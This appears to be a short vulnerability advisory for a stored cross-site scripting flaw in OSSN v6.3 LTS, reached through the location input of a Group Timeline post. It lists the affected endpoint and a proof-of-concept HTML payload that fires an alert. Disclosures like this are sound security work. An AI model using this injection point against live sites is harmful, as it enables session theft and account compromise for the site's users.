
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline module.
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline module.
The attacker must post something on the Group Timeline and insert the XSS payload at the location input in order to exploit the stored XSS. The XSS payload will be launched immediately after submission.
http://ip_address:port/ossn/group/{number}
POST /ossn/action/wall/post/g?ossn_ts=1656419377&ossn_token=c0ee6b52f853a5073679f7a82372a0726a6a6e7d5500ec372fef9341f1e45e21
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome Version 102.0.5005.115 (Official Build) (x86_64)
:shipit: Grim The Ripper Team by SOSECURE Thailand
Reference: